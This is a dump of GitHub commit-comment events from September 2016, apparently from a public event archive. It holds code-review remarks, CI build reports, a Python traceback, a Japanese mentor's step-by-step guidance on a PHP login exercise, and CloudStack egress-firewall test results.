{"id":"4572182071","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19048514,"position":49,"line":49,"path":"issue18/login.php","commit_id":"fd6819ab191660337d817cd05200965158ae01bf","created_at":"2016-09-16T04:55:08Z","updated_at":"2016-09-16T04:55:08Z","body":"まずはパスワードの暗号化を無視した作りで制作していきましょうか。\r\n\r\nおそらく「userのid」はユーザー自身が知らない場合もあります(福岡さんも自身のidを知っているサービスはあまりないのではないでしょうか)。なのでログイン時に送る値としては適切ではないかもしれませんね。\r\n\r\nログイン時によくある送る値としては、「ユーザー名 or メールアドレス」 + 「パスワード」ではないでしょうか。\r\n今福岡さんが作られたテーブルにはユーザー名のカラムがあるのでそちらにしましょうか(メールアドレスのカラムを追加しても良いですよ！)。ここあたりは掲示板と同じく仕様の問題ですね。新しいサービスを作るときは、よくあるサービスを観察してみると仕様のヒントが得られるかもしれません。\r\n\r\nここからはまずは福岡さんの中でログインのイメージを作ってほしいです(暗号化は無視して)。\r\n\r\nゴールだけ書きます。\r\n\r\nログイン機能のゴールとしては、\r\n\r\n- 送られてきたユーザー名から取得したユーザーのパスワードと、送られてきたパスワードが一致すればログインできる。\r\n\r\nということになります。\r\n\r\nまずは以上の機能を作った上で、以下の設定をしてみましょう。\r\n\r\n- 送られてきたユーザー名から取得できるユーザーが複数いたら困ってしまうので、ユーザー名は一意でなければなりません(ユーザー名から一件のユーザーを特定できる)。\r\n\r\n以下でもコメントとして付け足したことですが、その制約に関しては調べてみましょう。\r\nhttps://github.com/hdfukuoka1985/phptrainning/commit/b73430127ca8a31d1489f9ea8249983549905212"}},"created_at":"2016-09-16T04:55:08Z"}
{"id":"4572183063","type":"CommitCommentEvent","actor":{"login":"tomoaki0705"},"repo":{"name":"opencv/opencv"},"payload":{"comment":{"id":19048515,"position":null,"line":null,"path":null,"commit_id":"c5d7791b67cb2810bff9a3123f9f640e5dcc7530","created_at":"2016-09-16T04:55:36Z","updated_at":"2016-09-16T04:55:36Z","body":"Thanks for the notice @hkozachkov .\r\nI assume that you're using TX1, which I don't have.\r\nI [now confirmed](http://www.mersenneforum.org/showpost.php?s=b2fee8b7ae7c7b6c5a2c2c2884637cd7&p=356064&postcount=4) that NVCC on TK1 has both ```__arm__``` and ```__GNUC__``` macro predefined.\r\nI probably should put ```!defined (__NVCC__)``` at this place.\r\n"}},"created_at":"2016-09-16T04:55:36Z"}
{"id":"4572184695","type":"CommitCommentEvent","actor":{"login":"WeiLiweili"},"repo":{"name":"WeiLiweili/scripts"},"payload":{"comment":{"id":19048518,"position":null,"line":null,"path":null,"commit_id":"75a12fe6c509e0a027b7beeac6352780ce8aa3e5","created_at":"2016-09-16T04:56:23Z","updated_at":"2016-09-16T04:56:23Z","body":"Scripts for post-processing"}},"created_at":"2016-09-16T04:56:23Z"}
{"id":"4572187653","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19048523,"position":null,"line":null,"path":null,"commit_id":"8711f1c563d151c1a82d832edf04e78ec7fbb87d","created_at":"2016-09-16T04:57:49Z","updated_at":"2016-09-16T04:57:49Z","body":"Man those darn double semi-colons!"}},"created_at":"2016-09-16T04:57:49Z"}
{"id":"4572190385","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19048528,"position":null,"line":null,"path":null,"commit_id":"5f453c581bbc92ec491cf44d234e86b796240025","created_at":"2016-09-16T04:59:08Z","updated_at":"2016-09-16T04:59:08Z","body":"Updated code with review comments.\r\nSquashing and merging."}},"created_at":"2016-09-16T04:59:08Z"}
{"id":"4572192478","type":"CommitCommentEvent","actor":{"login":"db-coder"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19048537,"position":null,"line":null,"path":null,"commit_id":"2814ec54cc699e7c1e7ad3f26acc02302cc98c9b","created_at":"2016-09-16T05:00:02Z","updated_at":"2016-09-16T05:00:02Z","body":"Getting this error after this commit:\r\n\r\n```\r\nTraceback (most recent call last):\r\n  File \"pokecli.py\", line 841, in <module>\r\n    main()\r\n  File \"pokecli.py\", line 200, in main\r\n    bot.tick()\r\n  File \"/home/dibyendu/PokemonGo/PokemonGo-Bot-Dev/PokemonGo-Bot/pokemongo_bot/__init__.py\", line 713, in tick\r\n    if worker.work() == WorkerResult.RUNNING:\r\n  File \"/home/dibyendu/PokemonGo/PokemonGo-Bot-Dev/PokemonGo-Bot/pokemongo_bot/cell_workers/transfer_pokemon.py\", line 30, in work\r\n    self._release_pokemon_worst_in_group(group, pokemon_name)\r\n  File \"/home/dibyendu/PokemonGo/PokemonGo-Bot-Dev/PokemonGo-Bot/pokemongo_bot/cell_workers/transfer_pokemon.py\", line 59, in _release_pokemon_worst_in_group\r\n    pokemon_name)\r\nTypeError: 'NoneType' object is not iterable\r\n\r\n```"}},"created_at":"2016-09-16T05:00:02Z"}
{"id":"4572194104","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19048540,"position":15,"line":153,"path":"src/main/java/org/spongepowered/common/event/tracking/phase/PacketPhase.java","commit_id":"54102b9c7539b55b1bbf9d778b4fd185bce1a07d","created_at":"2016-09-16T05:00:40Z","updated_at":"2016-09-16T05:00:40Z","body":"This isn't quite being used, let alone making sense as to why the ids are all the same value of `0`. Could you clarify what their use is?"}},"created_at":"2016-09-16T05:00:40Z"}
{"id":"4572198327","type":"CommitCommentEvent","actor":{"login":"ZombieRoxtar"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19048554,"position":34,"line":34,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-16T05:02:39Z","updated_at":"2016-09-16T05:02:39Z","body":"main() doesn't take an int and string. I am way too tired to deal with this now:\r\n`int main(ULONG,PCCH [])': cannot convert argument 2 from 'char **' to 'PCCH []`"}},"created_at":"2016-09-16T05:02:39Z"}
{"id":"4572199744","type":"CommitCommentEvent","actor":{"login":"leereilly"},"repo":{"name":"csubagio/js13k-neonrunner"},"payload":{"comment":{"id":19048559,"position":null,"line":null,"path":null,"commit_id":"cb03ae10e9ce2a8840876c6b4c87a7905a86bc3b","created_at":"2016-09-16T05:03:16Z","updated_at":"2016-09-16T05:03:16Z","body":"```\r\n☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆ ☆☆ \r\n┏━┓┈┈╭━━━━╮┏━┓┈┈\r\n┃╱┃┈┈┃╱╭╮╱┃┃╱┃┈┈\r\n┃╱┗━┓┃╱┃┃╱┃┃╱┗━┓\r\n┃╱╱╱┃┃╱╰╯╱┃┃╱╱╱┃\r\n┗━━━┛╰━━━━╯┗━━━┛\r\n☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆\r\n```"}},"created_at":"2016-09-16T05:03:16Z"}
{"id":"4572199825","type":"CommitCommentEvent","actor":{"login":"essepuntato"},"repo":{"name":"perma-id/w3id.org"},"payload":{"comment":{"id":19048560,"position":null,"line":null,"path":null,"commit_id":"3123825d876f9d0ae75e3d2fd8182f5091a58dc9","created_at":"2016-09-16T05:03:19Z","updated_at":"2016-09-16T05:03:19Z","body":"Hi Daniel,\r\n\r\nI've just done a new PR referring to gh-pages instead of rawgit. Hope this is fine now :-)\r\n\r\nThanks again and have a nice day :-)\r\n\r\nS."}},"created_at":"2016-09-16T05:03:19Z"}
{"id":"4572199848","type":"CommitCommentEvent","actor":{"login":"mlysy"},"repo":{"name":"mlysy/msdeTest"},"payload":{"comment":{"id":19048561,"position":null,"line":null,"path":null,"commit_id":"9ad8fee216608b0429ed869bcb90ab91be79fb60","created_at":"2016-09-16T05:03:20Z","updated_at":"2016-09-16T05:03:20Z","body":"This did make things faster but still slower than no opp (down from 30% slower to 17% slower)...\r\n\r\nshould we just ignore opp completely if speed is the #1 priority?"}},"created_at":"2016-09-16T05:03:20Z"}
{"id":"4572199947","type":"CommitCommentEvent","actor":{"login":"sheniff"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19048563,"position":null,"line":null,"path":null,"commit_id":"7c54b751bf25f3f07250bc9769917d58b1d30934","created_at":"2016-09-16T05:03:22Z","updated_at":"2016-09-16T05:03:22Z","body":"Awesome, thanks also for the quick response. It's great to use packages that are so properly maintained."}},"created_at":"2016-09-16T05:03:22Z"}
{"id":"4572201091","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19048566,"position":null,"line":null,"path":null,"commit_id":"044f49c69816a3ac69defc6073c8c1b0a45b2208","created_at":"2016-09-16T05:03:55Z","updated_at":"2016-09-16T05:03:55Z","body":"Updated code with review comments.\r\nSquashing and merging."}},"created_at":"2016-09-16T05:03:55Z"}
{"id":"4572204204","type":"CommitCommentEvent","actor":{"login":"dgarijo"},"repo":{"name":"perma-id/w3id.org"},"payload":{"comment":{"id":19048579,"position":null,"line":null,"path":null,"commit_id":"3123825d876f9d0ae75e3d2fd8182f5091a58dc9","created_at":"2016-09-16T05:05:19Z","updated_at":"2016-09-16T05:05:19Z","body":"Thanks! I just merged it :)"}},"created_at":"2016-09-16T05:05:19Z"}
{"id":"4572205109","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19048582,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T05:05:45Z","updated_at":"2016-09-16T05:05:45Z","body":"I *assume* you just said that there was no relationship.  I am looking \nat this because I received five different emails about this, as folks \nfound it amusing...I don't troll this repo.  I would gladly grab \nanything from anywhere legal to help the project, but I would *never* \n*ever* do anything but slap the label \"I stole this from X\" on it.\n\nAnd I said you are welcome when you said Thank You.  I thought that was \ncredit enough.\n\n\nOn 2016-09-16 12:37 AM, Brady Miller wrote:\n>\n> I assumed we were all on the same page regarding sharing of ideas and \n> code. Let me know if this assumption is incorrect.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/openemr/openemr/commit/00ca05981d066657c47feef302b1fc91026144bb#commitcomment-19048464>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AAhzF2Uc7-T9G5m-ROQ__xVTOxiRofXuks5qqhz4gaJpZM4J-iJR>.\n>\n\n"}},"created_at":"2016-09-16T05:05:45Z"}
{"id":"4572205569","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048585,"position":null,"line":null,"path":null,"commit_id":"3901b072d07804c76f2947da1c08b20439b79ac1","created_at":"2016-09-16T05:05:59Z","updated_at":"2016-09-16T05:05:59Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-16T05:05:59Z"}
{"id":"4572207212","type":"CommitCommentEvent","actor":{"login":"ajkr"},"repo":{"name":"facebook/rocksdb"},"payload":{"comment":{"id":19048589,"position":44,"line":855,"path":"db/db_impl.cc","commit_id":"9e4aa798c3d47c6be64324bd9d38f0813c8ead7b","created_at":"2016-09-16T05:06:44Z","updated_at":"2016-09-16T05:06:44Z","body":"see https://reviews.facebook.net/D64029"}},"created_at":"2016-09-16T05:06:44Z"}
{"id":"4572208506","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048592,"position":null,"line":null,"path":null,"commit_id":"3901b072d07804c76f2947da1c08b20439b79ac1","created_at":"2016-09-16T05:06:58Z","updated_at":"2016-09-16T05:06:58Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T05:06:58Z"}
{"id":"4572212506","type":"CommitCommentEvent","actor":{"login":"AkihiroSuda"},"repo":{"name":"mitake/etcd"},"payload":{"comment":{"id":19048604,"position":null,"line":null,"path":null,"commit_id":"7dc6eba2d9f42b6cf1cb2b41f549456514cf1a47","created_at":"2016-09-16T05:08:53Z","updated_at":"2016-09-16T05:08:53Z","body":"nits about docker-compose.yml\r\n\r\n * you can use `extends: a1` for deduplication (example: https://github.com/aphyr/jepsen/blob/36a5019c3b7a10371336d2c58b9752770f313de6/docker/docker-compose.yml#L21)\r\n\r\n* you can specify `hostname` then you don't need to specify IP addresses?\r\n"}},"created_at":"2016-09-16T05:08:53Z"}
{"id":"4572217388","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048619,"position":null,"line":null,"path":null,"commit_id":"a50eadb1622126cc689ee89ca76b3270e3d16f95","created_at":"2016-09-16T05:11:18Z","updated_at":"2016-09-16T05:11:18Z","body":"makingPrettyTransition (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2327 of 2336 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.61%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T05:11:18Z"}
{"id":"4572220608","type":"CommitCommentEvent","actor":{"login":"tomkooij"},"repo":{"name":"PyTables/PyTables"},"payload":{"comment":{"id":19048662,"position":null,"line":null,"path":null,"commit_id":"11bd422201b674b60fb46439f68eb28d74356e40","created_at":"2016-09-16T05:12:54Z","updated_at":"2016-09-16T05:12:54Z","body":"@andreabedini  the line throws a `UnicodeEncodeError` on all strings containing non ascii characters. `str` is a bytestring in python 2.\r\n\r\nI did not know numpydoc existed. Is there a reason we are not just depending on (pip installing) that?"}},"created_at":"2016-09-16T05:12:54Z"}
{"id":"4572220705","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19048665,"position":null,"line":null,"path":null,"commit_id":"ec3d29e66716069b104226a170b13a759e7f5328","created_at":"2016-09-16T05:12:56Z","updated_at":"2016-09-16T05:12:56Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/ec3d29e66716069b104226a170b13a759e7f5328#commitcomment-19048221) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/bb9b122cc7e47b28c1158f0c11a57b10f68fd76d/daily_2016_9_16/report.md). cc @jrevels"}},"created_at":"2016-09-16T05:12:56Z"}
{"id":"4572222990","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048674,"position":null,"line":null,"path":null,"commit_id":"baea7bcb7db7430fd6431b571b3c3cb78b8afb00","created_at":"2016-09-16T05:14:05Z","updated_at":"2016-09-16T05:14:05Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T05:14:05Z"}
{"id":"4572223035","type":"CommitCommentEvent","actor":{"login":"hugocorbucci"},"repo":{"name":"agile-alliance-brazil/election"},"payload":{"comment":{"id":19048676,"position":null,"line":null,"path":null,"commit_id":"ecc2948af7b3409485655aa55193695a06f967dc","created_at":"2016-09-16T05:14:06Z","updated_at":"2016-09-16T05:14:06Z","body":"This actually also closed #7 "}},"created_at":"2016-09-16T05:14:06Z"}
{"id":"4572223650","type":"CommitCommentEvent","actor":{"login":"karup1990"},"repo":{"name":"apache/zeppelin"},"payload":{"comment":{"id":19048678,"position":34,"line":57,"path":"zeppelin-web/src/app/interpreter/interpreter.controller.js","commit_id":"21a084b170b29dee0f2d57aae22b00c785ef0c8e","created_at":"2016-09-16T05:14:23Z","updated_at":"2016-09-16T05:14:23Z","body":"@prabhjyotsingh  can we make this a relative number, say number of deps* 1000 ..? \r\nWhat do u think?\r\nLet me know, if it sounds good,  can create a PR for it"}},"created_at":"2016-09-16T05:14:23Z"}
{"id":"4572226905","type":"CommitCommentEvent","actor":{"login":"pshires"},"repo":{"name":"ORNL-BTRIC/EnergyPlus"},"payload":{"comment":{"id":19048693,"position":null,"line":null,"path":null,"commit_id":"11b915fc3ddcbce1893ae41a14efb4f2f8af61ea","created_at":"2016-09-16T05:16:05Z","updated_at":"2016-09-16T05:16:05Z","body":"@mbadams5 !"}},"created_at":"2016-09-16T05:16:05Z"}
{"id":"4572227025","type":"CommitCommentEvent","actor":{"login":"mitake"},"repo":{"name":"mitake/etcd"},"payload":{"comment":{"id":19048694,"position":null,"line":null,"path":null,"commit_id":"7dc6eba2d9f42b6cf1cb2b41f549456514cf1a47","created_at":"2016-09-16T05:16:09Z","updated_at":"2016-09-16T05:16:09Z","body":"Thanks, I'll follow your advice in the coming version."}},"created_at":"2016-09-16T05:16:09Z"}
{"id":"4572229237","type":"CommitCommentEvent","actor":{"login":"changtwzlc"},"repo":{"name":"lxshi/test"},"payload":{"comment":{"id":19048704,"position":null,"line":null,"path":null,"commit_id":"d3f3bb5aa13d1249607366ec641f4d25eb5306d3","created_at":"2016-09-16T05:17:14Z","updated_at":"2016-09-16T05:17:14Z","body":"Hi, this is a test. "}},"created_at":"2016-09-16T05:17:14Z"}
{"id":"4572235467","type":"CommitCommentEvent","actor":{"login":"lasconic"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":19048721,"position":null,"line":null,"path":null,"commit_id":"1b7daeb3830fbc6b706610eb0f2fd19f419c5c7a","created_at":"2016-09-16T05:20:24Z","updated_at":"2016-09-16T05:20:24Z","body":"No, not really but I believe it was by accident that the two columnns had equal width. I will revert the change to horizontal layout for the portrait/landscape combo"}},"created_at":"2016-09-16T05:20:24Z"}
{"id":"4572240780","type":"CommitCommentEvent","actor":{"login":"meraks"},"repo":{"name":"meraks/hello-world"},"payload":{"comment":{"id":19048730,"position":null,"line":null,"path":null,"commit_id":"1f48ddbaff0e993129c4f8aca1ad043e57ef978c","created_at":"2016-09-16T05:22:52Z","updated_at":"2016-09-16T05:22:52Z","body":"#include <stdio.h>\r\nint main(void)\r\n{\r\n       printf(\"hello-world\\n\")；\r\n}"}},"created_at":"2016-09-16T05:22:52Z"}
{"id":"4572242265","type":"CommitCommentEvent","actor":{"login":"shivapoudel"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19048734,"position":13,"line":18,"path":"composer.json","commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-16T05:23:36Z","updated_at":"2016-09-16T05:23:36Z","body":"Now it works both on Windows and Ubuntu #11934 :)"}},"created_at":"2016-09-16T05:23:36Z"}
{"id":"4572245149","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048742,"position":null,"line":null,"path":null,"commit_id":"baea7bcb7db7430fd6431b571b3c3cb78b8afb00","created_at":"2016-09-16T05:24:57Z","updated_at":"2016-09-16T05:24:57Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2370 tests passed, 1 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T05:24:57Z"}
{"id":"4572246601","type":"CommitCommentEvent","actor":{"login":"takanori0827"},"repo":{"name":"takanori0827/Suudoku_SourceCode"},"payload":{"comment":{"id":19048744,"position":null,"line":null,"path":null,"commit_id":"6b860d8b9805b1dd6b1e3bf0bb1bcaf50c503d55","created_at":"2016-09-16T05:25:37Z","updated_at":"2016-09-16T05:25:37Z","body":"Unity 5.4で作成"}},"created_at":"2016-09-16T05:25:37Z"}
{"id":"4572247965","type":"CommitCommentEvent","actor":{"login":"takanori0827"},"repo":{"name":"takanori0827/Suudoku_SourceCode"},"payload":{"comment":{"id":19048746,"position":2,"line":2,"path":"README.md","commit_id":"6b860d8b9805b1dd6b1e3bf0bb1bcaf50c503d55","created_at":"2016-09-16T05:26:16Z","updated_at":"2016-09-16T05:26:16Z","body":"Unity 5.4で作成"}},"created_at":"2016-09-16T05:26:16Z"}
{"id":"4572254207","type":"CommitCommentEvent","actor":{"login":"Woersty"},"repo":{"name":"Woersty/LoxBerry-Plugin-RPi-Monitor"},"payload":{"comment":{"id":19048770,"position":null,"line":null,"path":null,"commit_id":"9b14b9cc747ddeda5c806746738149292d427c0d","created_at":"2016-09-16T05:29:05Z","updated_at":"2016-09-16T05:29:05Z","body":"Fixes #2 "}},"created_at":"2016-09-16T05:29:05Z"}
{"id":"4572259573","type":"CommitCommentEvent","actor":{"login":"Yatinbaluja"},"repo":{"name":"Yatinbaluja/yatinbaluja"},"payload":{"comment":{"id":19048788,"position":null,"line":null,"path":null,"commit_id":"a05686861232c6da4d80cc867cf5551929b84d5b","created_at":"2016-09-16T05:31:30Z","updated_at":"2016-09-16T05:31:30Z","body":"[assembly_tutorial.pdf](https://github.com/Yatinbaluja/yatinbaluja/files/476117/assembly_tutorial.pdf)\r\n"}},"created_at":"2016-09-16T05:31:30Z"}
{"id":"4572260298","type":"CommitCommentEvent","actor":{"login":"Yatinbaluja"},"repo":{"name":"Yatinbaluja/yatinbaluja"},"payload":{"comment":{"id":19048790,"position":null,"line":null,"path":null,"commit_id":"a05686861232c6da4d80cc867cf5551929b84d5b","created_at":"2016-09-16T05:31:49Z","updated_at":"2016-09-16T05:31:49Z","body":"[verilog_tutorial.pdf](https://github.com/Yatinbaluja/yatinbaluja/files/476119/verilog_tutorial.pdf)\r\n"}},"created_at":"2016-09-16T05:31:49Z"}
{"id":"4572263968","type":"CommitCommentEvent","actor":{"login":"markocupic"},"repo":{"name":"contao/core"},"payload":{"comment":{"id":19048796,"position":null,"line":null,"path":null,"commit_id":"e29de00cf7d888a6c60d2db76f40ade3a7d05310","created_at":"2016-09-16T05:33:38Z","updated_at":"2016-09-16T05:33:38Z","body":"Ok. Thank you."}},"created_at":"2016-09-16T05:33:38Z"}
{"id":"4572271546","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048810,"position":null,"line":null,"path":null,"commit_id":"d2d64c20f6caeb070e70b429bf676ced4aa7b317","created_at":"2016-09-16T05:37:07Z","updated_at":"2016-09-16T05:37:07Z","body":"Related to: backdrop/backdrop-issues#2198 "}},"created_at":"2016-09-16T05:37:07Z"}
{"id":"4572271798","type":"CommitCommentEvent","actor":{"login":"jojo12"},"repo":{"name":"jemproject/JEM-Project"},"payload":{"comment":{"id":19048812,"position":null,"line":null,"path":null,"commit_id":"e8813722207da34bdaa3cfd2925d4376f34c568d","created_at":"2016-09-16T05:37:13Z","updated_at":"2016-09-16T05:37:13Z","body":"Perhaps it was wrong to change it in the master, I was not sure, because english is the reference.\r\nBut \"enhanced\" is much better than \"other\" and is often used to show possibilities, the normal users don't need."}},"created_at":"2016-09-16T05:37:13Z"}
{"id":"4572277196","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19048816,"position":20,"line":20,"path":"src/org/vitrivr/cineast/art/modules/VisualizationAverageColorGrid8Vertical.java","commit_id":"5c9b5428860009c3be0df59cdc37dde79c18fafc","created_at":"2016-09-16T05:39:39Z","updated_at":"2016-09-16T05:39:39Z","body":"What is the use of this? If you really want a visualization with a different aspect ratio, why not just scale the output  of the square one?"}},"created_at":"2016-09-16T05:39:39Z"}
{"id":"4572277663","type":"CommitCommentEvent","actor":{"login":"murali-reddy"},"repo":{"name":"murali-reddy/cloudstack"},"payload":{"comment":{"id":19048817,"position":null,"line":null,"path":null,"commit_id":"aa86e7d9353ca7b33ee46aad98ada03c5cdbc26d","created_at":"2016-09-16T05:39:53Z","updated_at":"2016-09-16T05:39:53Z","body":"component test test_egress_fw_rules.py results including 2 new test cases.\r\n----------------------------------------------------------------------\r\n\r\nTest By-default the communication from guest n/w to public n/w is NOT allowed. ... === TestName: test_01_1_egress_fr1 | Status : SUCCESS ===\r\nok\r\nTest egress rule with /32 CIDR of a VM, and check other VM in the ... === TestName: test_01_2_egress_fr1 | Status : SUCCESS ===\r\nok\r\nTest By-default the communication from guest n/w to public n/w is allowed. ... === TestName: test_01_egress_fr1 | Status : SUCCESS ===\r\nok\r\nTest Allow Communication using Egress rule with CIDR + Port Range + Protocol. ... === TestName: test_02_1_egress_fr2 | Status : SUCCESS ===\r\nok\r\nTest Allow Communication using Egress rule with /32 CIDR + Port Range + Protocol. ... === TestName: test_02_2_egress_fr2 | Status : SUCCESS ===\r\nok\r\nTest Allow Communication using Egress rule with CIDR + Port Range + Protocol. ... === TestName: test_02_egress_fr2 | Status : SUCCESS ===\r\nok\r\nTest Communication blocked with network that is other than specified ... === TestName: test_03_1_egress_fr3 | Status : SUCCESS ===\r\nok\r\nTest Communication blocked with network that is other than specified ... === TestName: test_03_egress_fr3 | Status : SUCCESS ===\r\nok\r\nTest Create Egress rule without CIDR ... === TestName: test_06_1_egress_fr6 | Status : SUCCESS ===\r\nok\r\nTest Create Egress rule without CIDR ... === TestName: test_06_egress_fr6 | Status : SUCCESS ===\r\nok\r\nTest Create Egress rule without End Port ... === TestName: test_07_1_egress_fr7 | Status : SUCCESS ===\r\nok\r\nTest Create Egress rule without End Port ... === TestName: test_07_egress_fr7 | Status : SUCCESS ===\r\nok\r\nTest Delete Egress rule ... === TestName: test_09_1_egress_fr9 | Status : SUCCESS ===\r\nok\r\nTest Delete Egress rule ... === TestName: test_09_egress_fr9 | Status : SUCCESS ===\r\nok\r\nTest Reboot Router ... === TestName: test_12_1_egress_fr12 | Status : SUCCESS ===\r\nok\r\nTest Reboot Router ... === TestName: test_12_egress_fr12 | Status : SUCCESS ===\r\nok\r\nTest Redundant Router : Master failover ... === TestName: test_13_1_egress_fr13 | Status : SUCCESS ===\r\nok\r\nTest Redundant Router : Master failover ... === TestName: test_13_egress_fr13 | Status : SUCCESS ===\r\nok\r\n\r\n----------------------------------------------------------------------\r\nRan 18 tests in 4385.635s\r\n\r\nOK"}},"created_at":"2016-09-16T05:39:53Z"}
